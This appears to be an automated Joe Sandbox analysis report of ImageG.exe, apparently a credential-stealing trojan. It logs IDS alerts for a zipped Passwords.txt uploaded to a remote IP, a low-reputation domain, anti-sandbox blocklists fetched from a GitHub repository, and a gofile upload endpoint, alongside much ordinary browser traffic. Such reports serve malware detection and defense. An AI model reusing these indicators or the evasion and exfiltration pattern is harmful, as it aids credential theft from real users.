        2025-03-15T20:26:43.087459+010020350161A Network Trojan was detected192.168.11.206101894.139.32.29443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-15T20:26:43.087459+010020350151A Network Trojan was detected192.168.11.206101894.139.32.29443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results
        Source: ImageG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeDirectory created: C:\Program Files\Windows NT\TableTextService\ImageG.exeJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nsnB244.tmp\7z-out\LICENSE.electron.txtJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\LICENSE.electron.txtJump to behavior
        Source: unknownHTTPS traffic detected: 104.16.40.101:443 -> 192.168.11.20:49771 version: TLS 1.2
        Source: ImageG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: ystem.Core.pdbpdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000001B.00000002.75860356551.0000016F5147B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: hell.PSReadline.pdb source: powershell.exe, 00000019.00000002.75878039487.000001D2805D0000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwvJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile opened: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\resourcesJump to behavior
        Source: chrome.exeMemory has grown: Private usage: 16MB later: 32MB

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2029846 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) : 192.168.11.20:61018 -> 94.139.32.29:443
        Source: Network trafficSuricata IDS: 2035015 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2 : 192.168.11.20:61018 -> 94.139.32.29:443
        Source: Network trafficSuricata IDS: 2035016 - Severity 1 - ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2 : 192.168.11.20:61018 -> 94.139.32.29:443
        Performs DNS queries to domains with low reputation
        Source: DNS query: nova-blight.xyz
        Queries Google from non browser process on port 80
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeHTTP traffic: GET / HTTP/1.1 Accept: application/json, text/plain, */* User-Agent: axios/0.27.2 Host: www.google.com Connection: close
        Source: global trafficHTTP traffic detected: GET /472b3c.jpg HTTP/1.1Host: i.imgflip.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 140.82.113.3 140.82.113.3
        Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
        Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
        Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.33.210
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.215.94
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.215.94
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.61.3
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: global trafficHTTP traffic detected: GET /472b3c.jpg HTTP/1.1Host: i.imgflip.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: ipinfo.ioConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blockedOS.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_ips.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blockedpcname.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_GPUTYPE.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_progr.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/blocked_hwid.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /KSCHcuck/sub/main/assets/nope.json HTTP/1.1Accept: application/json, text/plain, */*User-Agent: axios/0.27.2Host: raw.githubusercontent.comConnection: close
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIkqHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.cb278af4d754dd8a1a58.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8Origin: https://ntp.msn.comsec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.55sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; USRLOC=; MUID=254698E11FC6656435158D511ED164B7; MUIDB=254698E11FC6656435158D511ED164B7; _EDGE_S=F=1&SID=30A93CC630BE621C02C429763108637F; _EDGE_V=1
        Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.55sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; USRLOC=; MUID=254698E11FC6656435158D511ED164B7; MUIDB=254698E11FC6656435158D511ED164B7; _EDGE_S=F=1&SID=30A93CC630BE621C02C429763108637F; _EDGE_V=1
        Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.08ddc3af8246ad2193cd.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.1ed6fad3ee8a8960478c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.f2bbb948ce12d0d1625c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /servers HTTP/1.1Accept: */*accept-language: en-US,en;cache-control: no-cachepragma: no-cacheuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36Host: api.gofile.ioConnection: close
        Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&prerender=1 HTTP/1.1Host: ntp.msn.comConnection: keep-alivedevice-memory: 8rtt: 150downlink: 1.65ect: 4gsec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; USRLOC=; MUID=254698E11FC6656435158D511ED164B7; MUIDB=254698E11FC6656435158D511ED164B7; _EDGE_S=F=1&SID=30A93CC630BE621C02C429763108637F; _EDGE_V=1; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=11B0D042FA144E079760E2805176E478.RefC=2025-03-15T19:26:38Z; MicrosoftApplicationsTelemetryDeviceId=d89f1976-d7ca-4e02-b76b-e44b0670b02e; msnup=%7B%22cnex%22%3A%22no%22%7D
        Source: global trafficHTTP traffic detected: GET /sg/msn/1/cm?taboola_hm=254698E11FC6656435158D511ED164B7&gdpr=0&gdpr_consent= HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1Host: px.ads.linkedin.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /uidmappixel?ext_uid=254698E11FC6656435158D511ED164B7&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cksync.php?type=nms&cs=3&ovsid=254698E11FC6656435158D511ED164B7&gdpr=0&gdpr_consent= HTTP/1.1Host: hbx.media.netConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /m?cdsp=516415&c=254698E11FC6656435158D511ED164B7&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.mgid.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mapuid?suid=254698E11FC6656435158D511ED164B7&sid=16&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=288DBA3518D2609C3AB7AF8519A96184;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D288DBA3518D2609C3AB7AF8519A96184%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /sync?ssp=msn&id=254698E11FC6656435158D511ED164B7&gdpr=0&gdpr_consent= HTTP/1.1Host: code.yengo.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=254698E11FC6656435158D511ED164B7&external=true&gdpr=0&gdpr_consent= HTTP/1.1Host: visitor.omnitagjs.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
